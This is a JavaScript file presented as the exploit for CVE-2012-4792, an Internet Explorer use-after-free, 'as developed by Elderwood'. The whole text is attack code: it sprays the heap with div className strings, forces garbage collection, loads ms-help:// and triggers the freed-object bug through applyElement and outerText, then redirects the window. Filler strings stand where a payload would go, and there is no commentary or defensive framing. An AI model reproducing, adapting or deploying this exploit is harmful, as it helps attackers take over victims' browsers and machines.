Exploit for CVE-2012-4792 as developed by Elderwood

CVE-2012-4792-elderwood.js

var e0 = null;
var e1 = null;
var e2 = null;
var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
arrObject[i] = document.createElement('div');
arrObject[i].className = unescape("ababababababababababababababababababababa");
}  

for (var i = 0; i < arrObject.length; i += 2) {
arrObject[i].className = null;       
}
CollectGarbage();

for (var i = 0; i < elmObject.length; i ++) {
elmObject[i] = document.createElement( 'button' );
}

for(var i = 1; i < arrObject.length; i += 2) {
arrObject[i].className = null;       
}
CollectGarbage();
try {location.href = 'ms-help://'} catch(e){}

try {
e0 = document.getElementById ("a");
e1 = document.getElementById ("b");
e2 = document.createElement ("q");
e1.applyElement( e2 ); 
e1.appendChild(document.createElement( 'button' )); 
e1.applyElement( e0 );
e2.outerText = "";
e2.appendChild(document.createElement( 'body' )); 
} 
catch(e)
{
}
CollectGarbage();
for(var i =0; i < 20; i++) {
arrObject[i].className = unescape("ababababababababababababababababababababa");
}  
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");